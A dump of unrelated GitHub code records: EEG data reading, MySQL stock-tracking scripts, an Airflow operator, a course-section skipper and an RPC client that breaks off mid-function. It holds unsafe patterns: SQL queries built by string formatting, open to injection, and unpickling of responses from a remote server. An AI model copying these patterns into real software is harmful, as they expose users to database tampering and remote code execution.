(isinstance(point, int) \n or isinstance(point, datetime) \n or isinstance(point, timedelta)):\n raise TypeError(\"point must be either int, datetime or timedelta\")\n if not (sequence is None or isinstance(sequence, int)):\n raise TypeError(\"sequence must be either None or int\")\n if not isinstance(raw, bool):\n raise TypeError(\"raw must be a bool\")\n\n if sequence is not None:\n if StartTime is not None:\n Logger.warning(\"StartTime is defined together \"\n \"with sequence. StartTime will be ignored\")\n if sequence < 0 or sequence > self.GetNsequences():\n return default\n StartTime = self.GetSequenceStart(sequence)\n if StartTime is None:\n StartTime = self._startTime\n\n # point by time\n if isinstance(point, datetime):\n if sequence is not None:\n Logger.warning(\"sequence parameter is defined \"\n \"but point is passed by absolute time. \"\n \"sequence will be ignored\")\n # converting time to index\n point, sequence = self._getLocalIndex(point)\n\n # point by timedelta\n elif isinstance(point, timedelta):\n if sequence is not None:\n point = round(point.total_seconds() * self._frequency)\n if point > self.GetSequenceSize(sequence):\n point = -1\n else:\n point = StartTime + point\n point, sequence = self._getLocalIndex(point)\n\n # point by index\n else:\n if sequence is not None: \n if point > self.GetSequenceSize(sequence):\n point = -1\n else:\n point = self._startTime + timedelta(seconds=point\n / self._frequency)\n point, sequence = self._getLocalIndex(point)\n\n if point < 0 or sequence < 0:\n return default\n\n value = self._getValue(point, sequence)\n if raw:\n return value\n else:\n return self._fromRaw(value)\n\n def GetValueVector(self, timeStart, timeEnd, \n default=0, freq_mult=None, raw=False):\n \"\"\"\n Reads and returns datapoints in range [timeStart, timeEnd[.\n The data point coresponding to timeEnd is not retrieved to avoid\n overlaps in sequential reading. If timeEnd - timeStart < 1/frequency\n no data will be readed.\n\n If given hannel is a copy of an original channel, the values \n are retrieved from the original one. In such case the sequences \n and start times are also treated by original channel.\n\n All values that are output data sequences are filled with \n default value.\n\n This functions calls _getValueVector virtual function\n\n Parameters\n ----------\n timeStart : datetime\n Start time point for reading data\n timeEnd : datetime\n End time point for reading data. Must be equal or bigger than\n timeStart. Data point at timeEnd is not retrieved.\n timeEnd : timedelta\n time range from startTime to be read. Must be positive.\n default : float, 0\n default value for result, if data fals out of sequences\n freq_mult : int, None\n If set, resulting list will be oversampled by this value.\n Each additional cells will be filled with preceeding value\n raw : bool, False\n If set to true, the retrieved values will be unscaled\n\n Raises\n ------\n TypeError\n if passed parameters are of wrong type\n ValueError\n if timeStart is greater than stopTime\n NotImplemented\n if _getValueVector is not implemented for used format\n \"\"\"\n if self._baseChannel != self:\n return self._baseChannel.GetValueVector(timeStart, timeEnd,\n default, freq_mult, raw)\n if not (isinstance(timeStart, datetime)):\n raise TypeError(\"timeStart must be datetime\")\n if not (isinstance(timeEnd, datetime)\n or isinstance(timeEnd, timedelta, float)):\n raise TypeError(\"timeEnd must be either \"\n \"datetime, timedelta or float\")\n if freq_mult is None:\n freq_mult = 1\n if not (isinstance(freq_mult, int)):\n raise TypeError(\"freq_mult must be int\")\n if not (isinstance(raw, bool)):\n raise TypeError(\"raw must be boolean\")\n\n dt = timeEnd\n if isinstance(dt, datetime):\n dt = (dt - timeStart).total_seconds()\n elif isinstance(dt, timedelta):\n timeEnd = timeStart + dt\n dt = dt.total_seconds()\n if dt < 0:\n raise ValueError(\"time span must be positif\")\n\n # total size of data to retrieve\n points = int(dt * self._frequency)\n res = [default] * int(dt * self._frequency * freq_mult)\n seq = -1\n\n for seq_start, seq_size, seq_time\\\n in zip(self._seqStart, self._seqSize, self._seqStartTime):\n seq += 1\n # Sequance starts after end time\n if seq_time >= timeEnd: break\n # offset of sequance start relative to start time\n offset = round((timeStart - seq_time).total_seconds()\n * self._frequency)\n\n # Sequence ends before time start\n if (offset) >= seq_size:\n continue\n\n to_read = 0\n # Index to point in res\n index = 0\n read_start = 0\n\n # Case 1: sequence started before timeStart, offset is negative\n # We fill from beginning of res list,\n # but reading data from middle of sequence\n if offset >= 0 :\n # number of points to the end of sequence\n to_read = min(seq_size - offset, points)\n read_start = offset\n\n # Case 2: sequence starts after timeStart, offset is positive\n # We read from start of sequence,\n # but fill in the middle of res vector\n else:\n offset = -offset\n if offset * freq_mult > len(res): break\n to_read = min(seq_size, points - offset)\n index = offset * freq_mult\n\n d = self._getValueVector(read_start, to_read, seq)\n if len(d) != to_read:\n raise Exception(\"Sequence {}: readed {} points, \"\n \"{} expected\".format(\n seq, len(d), to_read))\n for i in range(0, to_read):\n # res[index] = struct.unpack(self.Endian\\\n # + self._Marks[b'\\x20\\x00\\x00\\x00'].Format,\n # data[i:i+self._dataSize])[0]\n res[index] = d[i]\n if res[index] > self._digMax: res[index] = self._digMax\n if res[index] < self._digMin: res[index] = self._digMin\n if not raw:\n res[index] = self._fromRaw(res[index])\n # filling the interpoint space with previous value\n for j in range(index + 1, index + freq_mult):\n res[j] = res[index]\n index += freq_mult\n return res\n\n def _getLocalIndex(self, time):\n \"\"\"\n Retrieves point index and sequence for a given time. If there \n no corresponding index and/or sequence, will return -1 as \n corresponding value.\n\n Do not checks for types\n\n Parameters\n ----------\n time : datetime\n\n Returns\n -------\n (int, int)\n a tuple of (point, sequence). If time is before the start \n of first sequence, sequence will be set to -1, else \n sequence will be the latest sequence before the given time.\n If time is after the sequence end, the index will be set to -1\n \"\"\"\n ind = -1\n seq = -1\n for t in self._seqStartTime:\n if round((time - t).total_seconds()\n * self._frequency) < 0:\n break\n seq += 1\n if seq >= 0:\n ind = round((time - self.GetSequenceStart(seq)).total_seconds()\n * self._frequency)\n if ind >= self.GetSequenceSize(seq):\n ind = -1\n return (ind, seq)\n\n def _getTime(self, point, StartTime, freqMultiplier):\n \"\"\"\n Retrieves time corresponding to a index given starting time \n and frequency multiplier. \n\n Do not check for parameters validity\n\n Parameters\n ----------\n point : int\n global index of a data point\n SatrtTime : datetime\n Starting time of data\n freqMultiplier : int\n frequency multiplier to convert channel frequency to \n global one\n\n Returns\n -------\n datetime\n time corresponding to given index\n \"\"\"\n return StartTime + self._getDeltaTime(point, freqMultiplier)\n\n def _getDeltaTime(self, point, freqMultiplier):\n \"\"\"\n Retrieves the time passed since the reference time,\n given data point index and frequency multiplier.\n\n Do not check for parameters validity.\n\n Parameters\n ----------\n point : int\n index of data point\n freqMultiplier : int\n frequency multiplier to convert channel frequency to \n global one\n\n Returns\n -------\n timedelta\n time passed since start\n \"\"\"\n return timedelta(seconds=point / (self._frequency * freqMultiplier))\n\n def _getValue(self, point, sequence):\n \"\"\"\n Retrieves value of a particular time point.\n This is virtual function and will always raise\n NotImplemented error.\n\n The reimplementation of function is not expected to check \n the validity of parameters and ranges.\n\n Parameters\n ----------\n point : int\n the index of the point to be retrieved\n sequence : int\n specifies the sequence in which data will be retrieved\n\n Returns\n -------\n float or int\n the value of required point\n\n Raises\n ------\n NotImplementedError\n if _getValue is not implemented for given format\n \"\"\"\n raise NotImplementedError(\"_getValue\")\n\n def _getValueVector(self, index, size, sequence):\n \"\"\"\n Reads maximum size points from a given sequence\n starting from index. If size is negative, will\n retrieve data till the end of sequence.\n Will stop at end of sequence.\n\n This is virtual function and will always raise\n NotImplemented error.\n\n The reimplementation of function is not expected to check \n the validity of parameters and ranges.\n\n Parameters\n ----------\n index : int\n a valid index from where data will be read\n size : int\n number of data-points retrieved, will not stop if reaches \n end of sequence or end of file\n sequence :\n index of sequence to be read from\n\n Returns\n -------\n list(int)\n a list of readed data\n\n Raises\n ------\n IOError\n if reaches EOF before reading requested data\n NotImplementedError\n if function is not defined for given format\n \"\"\"\n raise NotImplementedError(\"_getValueVector\")\n\n def __lt__(self, other):\n \"\"\"\n Less operator for sorting\n\n Returns\n -------\n bool\n \"\"\"\n return self._name < other._name\n","repo_name":"nbeliy/eegBidsCreator","sub_path":"DataStructure/Generic/Channel.py","file_name":"Channel.py","file_ext":"py","file_size_in_byte":35364,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"42599506413","text":"#!/usr/bin/env python\r\n# encoding: utf-8\r\n'''\r\n@author: Spoon\r\n@contact: zxin088@gmail.com\r\n@file: get_apk_info.py\r\n@time: 2019/5/22 9:12\r\n@desc:\r\n aapt d badging filepath/..apk\r\n https://blog.csdn.net/tabactivity/article/details/76992994\r\n'''\r\n\r\n\r\nimport functools\r\nfrom app.libs.read_apk.common.aapt import aapt_tools\r\nimport os\r\nimport re\r\n\r\n\r\ndef log(text):\r\n def decorator(func):\r\n @functools.wraps(func)\r\n def wrapper(*args, **kw):\r\n print('%s %s():' % (text, func.__name__))\r\n return func(*args, **kw)\r\n return wrapper\r\n return decorator\r\n\r\n\r\n@log('call')\r\ndef get_apk_info(apk_path):\r\n if apk_path:\r\n output = aapt_tools().badging(os.path.join(os.getcwd(), apk_path))\r\n print('应用名称: %s' % re.findall(r\"application-label:'(.*?)'\", output)[0])\r\n print('应用包名: %s' % re.findall(r\"package: name='(.*?)' \", output)[0])\r\n print('应用版本: %s' % re.findall(r\"versionName='(.*?)' \", output)[0])\r\n else:\r\n print('请按套路出牌!!!')\r\n os.system('pause')\r\n\r\n\r\nif __name__ == '__main__':\r\n get_apk_info(apk_path = input('请输入APK文件路径!!!\\n'))","repo_name":"StickToIdeals/flask_demo","sub_path":"app/libs/get_apk_info.py","file_name":"get_apk_info.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"29973714476","text":"#!/usr/bin/env python\n# insert_stocks_cl.py\nimport MakeConnection\n#from mysql.connector import MySQLConnection, Error\nimport configparser\nimport os\nimport time\n#noinspection PyUnresolvedReferences\nimport datetime\n\n\n\n# validate date\ndef validate(date_text):\n try:\n datetime.datetime.strptime(date_text, '%Y-%m-%d')\n return 1\n except ValueError:\n print(\"wrong date\", date_text)\n return 0\n\n\n# find things\nclass Find:\n def __init__(self, conn, m_acct_type, m_fname, m_sacct, m_lacct, m_fid, m_ssymbol, m_qty, m_price, m_fee, m_tdate, m_bs, \\\n m_aid, m_sname, m_agent, m_cszip, m_email, m_phone, m_street, m_sid ):\n # self.name = name # instance variable unique to each instance\n self.conn = conn\n self.m_acct_type = m_acct_type\n self.m_fname = m_fname\n self.m_sacct = m_sacct\n self.m_lacct = m_lacct\n self.m_fid = m_fid\n self.m_ssymbol = m_ssymbol\n self.m_qty = m_qty\n self.m_price = m_price\n self.m_fee = m_fee\n self.m_tdate = m_tdate\n self.m_bs = m_bs\n self.m_aid = m_aid\n self.m_sname = m_sname\n self.m_agent = m_agent\n self.m_cszip = m_cszip\n self.m_email = m_email\n self. m_phone = m_phone\n self.m_street = m_street\n self.m_sid = m_sid\n print('conn:', self.conn)\n yn = input('stopping at line 82')\n\n def find_firm(self):\n \"\"\" find aid, stock_symbol, if already in stocks table\"\"\"\n # print(\"aid,stock_symbol\", aid, stock_symbol)\n cursor = self.conn.cursor()\n # m_symbol = input(\"Symbol: \")\n # m_symbol = '%{}%'.format(m_symbol)\n # print(m_symbol)\n sql = \"\"\" SELECT f.FID FROM firms f WHERE f.name like '%s';\"\"\" % self.m_fname\n cursor.execute(sql)\n data = cursor.fetchall()\n\n if len(data) == 0:\n # print(len(data))\n # t = input(\"line: 51\")\n # print('not found')\n print(self.m_name, \" not found...\")\n # yn = '0'\n return 0\n else:\n print(\"ID-----FIRM----------\")\n for row in data:\n print(\"{}\".format(row[1]),\" \",\"{}\".format(row[0]))\n\n def find_account(self):\n cursor = self.conn.cursor()\n \"\"\" find firm name, if already in firm table\"\"\"\n while True:\n\n self.m_lacct = input(\"Enter account number: \")\n self.m_lacct = '%'+self.m_lacct+'%'\n\n # print(val1)\n sql = \"\"\"SELECT aid, long_acct FROM accounts WHERE long_acct LIKE '%s' \"\"\" % self.m_lacct\n cursor.execute(sql)\n data = cursor.fetchall()\n\n if len(data) > 0:\n sfound = 1\n elif len(data) == 0:\n sfound = 0\n return sfound\n if sfound == 1:\n for row in data:\n print(row)\n # answer = input(\"Do you see your \"+msg+\" here (y/n)\")\n # if answer == 'y' or answer == 'Y':\n val = input(\"enter account index number (AID): \")\n return val\n\n\n def find_stock(self):\n \"\"\" find aid, stock_symbol, if already in stocks table\"\"\"\n # print(\"aid,stock_symbol\", aid, stock_symbol)\n print('conn', self.conn)\n yn = input('stopping at line 138')\n\n cursor = self.conn.cursor()\n\n # m_aid = aid\n m_symbol = input(\"Enter symbol : \")\n m_symbol = '%{}%'.format(m_symbol)\n\n while True:\n\n sql = \"\"\"SELECT a.aid, a.long_acct, s.quantity,s.stock_symbol,s.price,s.name,s.trans_date, a.short_acct\\\n FROM (stocks s inner join accounts a on s.aid = a.aid) WHERE stock_symbol LIKE '%s' \"\"\" % self.m_ssymbol\n print(\"AID LACCT QTY SYMBOL PRICE NAME DATE SACCOUNT\")\n try:\n cursor.execute(sql, m_symbol)\n row = cursor.fetchone()\n while row is not None:\n print(\"{0.3f}\".format(row[0]), \"{:25s}\".format(row[1]), \"{0:.3f}\".format(row[2]), \"{:15s}\".format(row[3]), \\\n \"{0.3f}\".format(row[4]), \" \", \"{:25s} \".format(row[5]), \"{:%m/%d/%Y}\".format(row[6]), \"{:25s}\".format(row[7]))\n row = cursor.fetchone()\n except Error as e:\n print(e)\n finally:\n cursor.close()\n\n self.conn.close()\n\n answer = input(\"\\nIf you see your stock lot here enter SID number, search again, or quit, enter (index (SID)/a/q)\")\n val = ' '\n if val == int(answer):\n return val\n elif answer == 'N' or answer == 'n':\n return 0\n elif answer == 'A' or answer == 'a':\n return 'a'\n\n # symbol\n\n\nclass Insert:\n def __init__(self, conn, m_acct_type, m_fname, m_sacct, m_lacct, m_fid, m_ssymbol, m_qty, m_price, m_fee, m_tdate, m_bs, \\\n m_aid, m_sname, m_agent, m_cszip, m_email, m_phone, m_street ):\n # self.name = name # instance variable unique to each instance\n self.conn = conn\n self.m_acct_type = m_acct_type\n self.m_fname = m_fname\n self.m_sacct = m_sacct\n self.m_lacct = m_lacct\n self.m_fid = m_fid\n self.m_ssymbol = m_ssymbol\n self.m_qty = m_qty\n self.m_price = m_price\n self.m_fee = m_fee\n self.m_tdate = m_tdate\n self.m_bs = m_bs\n self.m_aid = m_aid\n self.m_sname = m_sname\n self.m_agent = m_agent\n self.m_cszip = m_cszip\n self.m_email = m_email\n self. m_phone = m_phone\n self.m_street = m_street\n\n def create_firm(self):\n self.m_fname = self.m_fname.replace(\"%\", \"\")\n # print('firm name', self.firm_name)\n # yn=input('line 65, wait')\n cursor = self.conn.cursor()\n # this sql actually works!!!!\n sql = \"\"\"INSERT INTO firms (name, street, CityStateZip, Agent, phone, email) VALUES ('%s', '%s', '%s', '%s', '%s', '%s') \"\"\"\n cursor.execute(sql,(self.m_fname, self.m_street, self.m_cszip, self.m_agent, self.m_phone, self.m_email))\n self.conn.commit()\n\n def create_account(self):\n cursor = self.conn.cursor()\n\n sql = \"\"\"INSERT INTO accounts (short_acct, long_acct, acct_type, fid) VALUES ('%s', '%s', '%s' '%s') \"\"\"\n cursor.execute(sql, (self.sacct, self.m_lacct, self.m_acct_type, self.m_fid))\n self.conn.commit()\n\n def insert_stock(self):\n cursor = self.conn.cursor()\n # global g_name\n # need account index (aid)\n sql = \"\"\"INSERT INTO stocks (stock_symbol, name, quantity, price, fee, trans_date, buyorsell, aid) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)\"\"\"\n cursor.execute(sql, (self.m_ssymbol, self.m_sname, self.m_qty, self.m_price, self.m_fee, self._tdate, self.m_bs, self.m_aid))\n self.conn.commit()\n return cursor.lastrowid\n\n\ndef main():\n muser=''\n mpwd=''\n mhost=''\n mport=0\n mfile=''\n\n a1 = MakeConnection(muser, mpwd, mhost, mport, mfile)\n b = a1.get_config()\n\n # conn = ' '\n a1 = MakeConnection(b[0], b[1], b[2], b[3], b[4])\n print(b[0])\n yn = input('stopping at line 235')\n conn = a1.create_connection()\n print('conn', conn)\n yn = input('stopping at line 238 ')\n\n m_acct_type = ''\n m_fname = ' '\n m_sacct = ''\n m_lacct = ''\n m_fid = 0\n m_ssymbol = ''\n m_qty = 0\n m_price = 0\n m_fee = 0\n m_tdate = ' '\n m_bs = ''\n m_aid = 0\n m_sname = ' '\n m_agent = ''\n m_cszip = ''\n m_email = ''\n m_phone = ''\n m_street = ''\n m_sid = 0\n\n mFind1 = Find(conn, m_acct_type, m_fname, m_sacct, m_lacct, m_fid, m_ssymbol, m_qty, m_price, m_fee, m_tdate, m_bs, m_aid, m_sname, m_agent, m_cszip, m_email, m_phone, m_street, m_sid)\n while True:\n\n # mFind = Find\n while True:\n answer = mFind1.find_stock()\n if answer == 1:\n print('Stock lot on file')\n elif answer == 0:\n print(\"stock lot not found in database: \")\n time.sleep(2)\n Insert.insert_stock()\n elif answer == 'a':\n continue\n else:\n yn = input('[r] repeat,[q]quit')\n if yn == 'q' or yn == 'Q':\n break\n\n yn = input('Use another account? (y/n)')\n if yn == 'n' or yn == 'N':\n conn.close()\n break\n\n\n\nif __name__ == '__main__':\n main()\n os.system('clear')\n","repo_name":"jimby/cliStocks","sub_path":"insert_stocks_cl.py","file_name":"insert_stocks_cl.py","file_ext":"py","file_size_in_byte":8614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29973652606","text":"\nfrom mysql.connector import (connection)\n# import importlib\nimport configparser\n# import find_menuNew\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\nmuser = config['DEFAULT']['muser']\nmpwd = config['DEFAULT']['mpwd']\nmhost = config['DEFAULT']['mhost']\nmport = config['DEFAULT']['mport']\nmfile = config['DEFAULT']['mfile']\nprint(muser)\n# yn=input(\"stop at line 14\")\n\nclass FindFirm:\n\n def __init__(self, name):\n self.name = name # instance variable unique to each instance\n\n def create_connection(db_user, db_pwd, db_host, db_port, db_file):\n try:\n conn = connection.MySQLConnection(user=db_user, password=db_pwd, host=db_host, port=db_port, database=db_file)\n cursor = conn.cursor()\n return conn\n except Exception as e:\n return e\n \n\n def find_firm(conn, m_var):\n \"\"\" find aid, stock_symbol, if already in stocks table\"\"\"\n # print(\"aid,stock_symbol\", aid, stock_symbol)\n cursor = conn.cursor()\n # m_symbol = input(\"Symbol: \")\n # m_symbol = '%{}%'.format(m_symbol)\n # print(m_symbol)\n sql = \"\"\" SELECT f.name, f.FID FROM firms f WHERE f.name like '%s';\"\"\" % m_var \n # sql = \"\"\"SELECT s.sid, s.stock_symbol,s.quantity,s.name, s.price,p.prices, a.long_acct, s.transwer_date FROM ((stocks s inner join accounts a on s.aid=a.aid) inner join prices p on s.sid=p.sid) WHERE s.stock_symbol like '%s' \"\"\" % m_firm\n # sql = \"\"\"select s.sid, s.price from stocks s where s.stock_symbol like '%s';\"\"\" % m_symbol\n cursor.execute(sql)\n data = cursor.fetchall()\n\n if len(data) == 0:\n # print(len(data))\n # t = input(\"line: 51\")\n # print('not found')\n print(m_var, \"not found...\")\n # yn = '0'\n return 0\n else:\n print(\"ID-----FIRM NAME\")\n for row in data:\n print(\"{}\".format(row[1]),\" \",\"{}\".format(row[0]))\n\ndef main():\n \n d = FindFirm\n\n conn = d.create_connection(muser, mpwd, mhost, mport, mfile)\n\n while True:\n m_var = input(\"Firm: \")\n m_var = '%{}%'.format(m_var)\n if m_var == \"%%\":\n break\n d.find_firm(conn, m_var)\n yn = input('Continue (y/n)')\n if yn == 'n':\n break\n exit \n\n\nif __name__ == '__main__':\n main()\n # import sys\n # find_menuNew\n\n","repo_name":"jimby/cliStocks","sub_path":"find_firm.py","file_name":"find_firm.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32455723540","text":"import functools\r\nimport datetime\r\nimport time\r\n\r\ndef timeit(filepath:str)->callable:\r\n def decor(func: callable) -> callable:\r\n @functools.wraps(func)\r\n def wrapper(*args, **kwargs):\r\n start = time.time()\r\n func(*args, **kwargs)\r\n print('estimation time for ', func.__name__, ':', time.time()-start)\r\n with open(filepath, \"a\") as fl:\r\n fl.write(\r\n f'func call time:{datetime.datetime.now()} estimation time for ,func_name :{func.__name__},:,{time.time()-start}\\n')\r\n return wrapper\r\n return decor\r\n\r\n@timeit('aa.txt')\r\ndef foo():\r\n time.sleep(2)\r\n print('foo is called')\r\n\r\n\r\n@timeit('bar.txt')\r\ndef bar():\r\n time.sleep(4)\r\n print('bar is called')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n bar()\r\n foo()\r\n","repo_name":"gyulambaryanartur/Python-Adwanced","sub_path":"decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36236201123","text":"from airflow.utils.decorators import apply_defaults\n\nfrom airflow.models import BaseOperator\nfrom airflow.hooks.S3_hook import S3Hook\n\nfrom autopilot_plugin.hooks.autopilot_hook import AutopilotHook\n\nfrom tempfile import NamedTemporaryFile\nimport json\n\n\nclass AutopilotToS3Operator(BaseOperator):\n \"\"\"\n Autopilot to S3 Operator\n :param autopilot_conn_id: The Airflow connection id used to store\n the Airflow credentials.\n :type autopilot_conn_id: string\n :param autopilot_resource : Resource to call. Possible values are:\n - lists\n - smart_segments\n - contacts/custom_fields\n - triggers\n Leave blank if you want to list all contacts.\n :type autopilot_resource: string\n :param payload: *(optional)* payload to send with request.\n :type payload: dict\n :param results_field: *(optional* the field with the results from\n the api's response. Default to \"contacts\",\n if contacts field is true else defaults\n to the resource's name\n :type results_field: string\n :param ids: *(optional)* ids for the api call\n (for smart_segments)\n :type ids: array\n :param contacts: *(optional)* true if the operator should get\n all contacts from resource.\n Defaults to false\n :type contacts: boolean\n :param s3_conn_id: The Airflow connection id used\n to store the S3 credentials.\n :type s3_conn_id: string\n :param s3_bucket: The S3 bucket to be used\n to store the Autopilot data.\n :type s3_bucket: string\n :param s3_key: The S3 key to be used to store\n the Autopilot data.\n :type s3_bucket: string\n \"\"\"\n template_field = ('s3_key', )\n\n @apply_defaults\n def __init__(self,\n autopilot_conn_id,\n autopilot_resource='',\n results_field=None,\n ids=None,\n contacts=False,\n s3_conn_id=None,\n s3_bucket=None,\n s3_key=None,\n payload=None,\n *args,\n **kwargs):\n super().__init__(*args, **kwargs)\n self.autopilot_conn_id = autopilot_conn_id\n self.autopilot_resource = autopilot_resource\n self.results_field = results_field\n self.ids = ids\n self.contacts = contacts\n self.s3_conn_id = s3_conn_id\n self.s3_bucket = s3_bucket\n self.s3_key = s3_key\n self.payload = payload\n\n if self.autopilot_resource.lower() not in ('lists',\n 'smart_segments',\n 'contacts/custom_fields',\n 'triggers'):\n raise Exception('Specified Autopilot resource not currently supported.')\n\n def execute(self, context):\n hook = AutopilotHook(http_conn_id=self.autopilot_conn_id)\n\n results = []\n\n if self.ids:\n for id in self.ids:\n id_endpoint = \"{}/{}\".format(self.autopilot_resource, id)\n\n if self.contacts:\n results += self.get_all_contacts(hook,\n id_endpoint,\n data=self.payload\n )\n else:\n results += self.get(hook,\n id_endpoint,\n data=self.payload\n )\n elif self.contacts:\n results += self.get_all_contacts(hook,\n self.autopilot_resource,\n data=self.payload\n )\n else:\n results += self.get(hook,\n self.autopilot_resource,\n results_field=self.results_field,\n data=self.payload\n )\n\n with NamedTemporaryFile(\"w\") as tmp:\n for result in results:\n tmp.write(json.dumps(result) + '\\n')\n\n tmp.flush()\n\n dest_s3 = S3Hook(s3_conn_id=self.s3_conn_id)\n\n dest_s3.load_file(\n filename=tmp.name,\n key=self.s3_key,\n bucket_name=self.s3_bucket,\n replace=True\n )\n\n dest_s3.connection.close()\n\n def get_all_contacts(self,\n hook,\n resource,\n data=None,\n headers=None,\n extra_options=None):\n \"\"\"\n Get contacts from all pages.\n \"\"\"\n all_pages = []\n total_contacts = -1\n next_token = None\n\n while len(all_pages) != total_contacts:\n if not next_token:\n result = hook.run('{}/contacts'.format(resource),\n data,\n headers,\n extra_options).json()\n else:\n result = hook.run('{}/contacts/{}'.format(resource, next_token),\n data,\n headers,\n extra_options).json()\n\n all_pages += result.get('contacts', None)\n\n total_contacts = result.get('total_contacts', None)\n\n if 'bookmark' in result:\n next_token = result.get('bookmark', None)\n\n return all_pages\n\n def get(self,\n hook,\n endpoint,\n results_field=None,\n data=None,\n headers=None,\n extra_options=None):\n\n result = hook.run(endpoint, data, headers, extra_options).json()\n if not results_field:\n results_field = endpoint\n\n if results_field in result:\n return result.get(results_field)\n else:\n return result\n","repo_name":"airflow-plugins/autopilot_plugin","sub_path":"operators/autopilot_to_s3_operator.py","file_name":"autopilot_to_s3_operator.py","file_ext":"py","file_size_in_byte":6750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12891100748","text":"from collections import deque\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n def maxLevelSum(self, root: TreeNode) -> int:\n bfs = deque([root])\n level, ans = 0, 0\n max_sum = float('-inf')\n while bfs:\n level += 1\n curr_sum = 0\n for _ in range(len(bfs)):\n node = bfs.popleft()\n if node.left:\n bfs.append(node.left)\n if node.right:\n bfs.append(node.right)\n curr_sum += node.val\n if curr_sum > max_sum:\n max_sum = curr_sum\n ans = level\n return ans","repo_name":"Vskesha/leetcode_solutions","sub_path":"leetcode_solutions/maximum_level_sum_of_a_binary_tree_1161.py","file_name":"maximum_level_sum_of_a_binary_tree_1161.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"72883279612","text":"# -*- coding: utf-8 -*-\nfrom hackcqooc.core import Core\n\nimport threading\nimport logging\nfrom time import sleep\n\n\nclass skipper(threading.Thread):\n \"\"\"用于执行跳过课程任务的线程类\"\"\"\n\n def __init__(self, core: Core, sectionList: list) -> None:\n \"\"\"参数说明:\n *core* 功能内核对象,来自src.core\n *sectionList* 包含课程ID的字符串列表\n \"\"\"\n threading.Thread.__init__(self)\n self.core = core\n self.sectionList = sectionList\n self.success = 0\n self.fail = 0\n self.current = 1\n self.state = False\n\n def run(self) -> None:\n logging.info(\"skip thread started\")\n self.skip(self.sectionList)\n\n def skip(self, sectionList: list) -> None:\n logging.info(\"skip task started\")\n for i in sectionList:\n result = self.core.skip_section(i)\n if result[\"code\"] == 200:\n self.success += 1\n else:\n self.fail += 1\n # 对于任务列表长度为1的情况就没有必要sleep这么久了,\n # 只有长度超过1的才要分别sleep 31秒\n if len(sectionList) != 1:\n sleep(31)\n self.current += 1\n # 跳出循环说明任务执行完成,修改状态标志位为True\n self.state = True\n\n def getState(self) -> bool:\n \"\"\"返回True说明任务执行完成,False为未完成\"\"\"\n return self.state\n","repo_name":"Fatpandac/fuck_cqooc","sub_path":"src/skipper.py","file_name":"skipper.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"78"} +{"seq_id":"19088629339","text":"import EMDA_Utilities as utils\r\nimport os\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n# switch to root directory\r\nos.chdir(\"../\")\r\n\r\n# Path to the data to be imported\r\ncsv_path = \"data_release/caiso/caiso_rto_genmix.csv\"\r\n\r\n# read RTO-wide LMP data for CAISO using provided utility script\r\n[dates, types, data] = utils.read_genmix(csv_path)\r\n\r\n# findout what are the type of fuels in this RTO\r\nfuel_types = list(set(types))\r\nprint(\"The type of fuels are:\")\r\nprint(fuel_types)\r\nnum_fuel_type = len(fuel_types)\r\n# count the capacity of each type of fuel\r\ngen_ct = [0] * num_fuel_type\r\n\r\n# solar capacity of each day\r\nsolar_output = []\r\n\r\n# iterate through each entry to aggregate data\r\nfor i in range(len(dates)):\r\n # fuel type of this entry\r\n gen_type = types[i]\r\n type_ind = fuel_types.index(gen_type)\r\n # mean of capacity of that day for that fuel type\r\n gen_capacity = np.sum(data[i,:])\r\n gen_ct[type_ind] += gen_capacity\r\n\r\n # check if fuel is solar, if yes then append to solar container\r\n if gen_type == 'solar':\r\n solar_output.append(gen_capacity)\r\n\r\n# draw a bar plot of each type of fuel \r\nplt.bar(fuel_types,gen_ct)\r\nplt.title('Annual Capacity of Each Fuel Type in CAISO')\r\nplt.show()\r\n\r\n# plot the trend of solar energy over this entire dataset\r\nplt.plot(solar_output)\r\nplt.title('Daily Output of Solar in CAISO')\r\nplt.show()\r\n","repo_name":"tamu-engineering-research/COVID-EMDA","sub_path":"startup/example_gemix.py","file_name":"example_gemix.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"78"} +{"seq_id":"37425444744","text":"from pickle import loads\r\nfrom pickle import dumps\r\nfrom pickle import UnpicklingError\r\nfrom aiohttp import ClientSession\r\nfrom aiohttp import ClientError\r\nfrom typing import Any\r\n\r\n\r\nclass RPC:\r\n\r\n RPC_SERVER = \"http://deepthreads.ru\"\r\n PICKLE_PROTOCOL = 4\r\n\r\n @classmethod\r\n async def _rpc(cls, func: str, *args, **kwargs) -> Any:\r\n async with ClientSession(base_url=cls.RPC_SERVER) as session:\r\n data = dumps((args, kwargs), protocol=cls.PICKLE_PROTOCOL)\r\n try:\r\n response = loads(\r\n await (await session.post(f\"/rpc?func={func}&v={cls.PICKLE_PROTOCOL}\", data=data)).read()\r\n )\r\n if isinstance(response, tuple) and response[0] == \"e\":\r\n raise Exception(f\"RPC error ({response[1]}). {response[2]}\")\r\n except UnpicklingError:\r\n raise ValueError(f\"Cannot unpickle response from the RPC server.\")\r\n except ClientError:\r\n raise ConnectionError(f\"Cannot send request to the RPC server.\")\r\n return response\r\n\r\n @classmethod\r\n async def generate_request_signature(cls, path: str, headers: 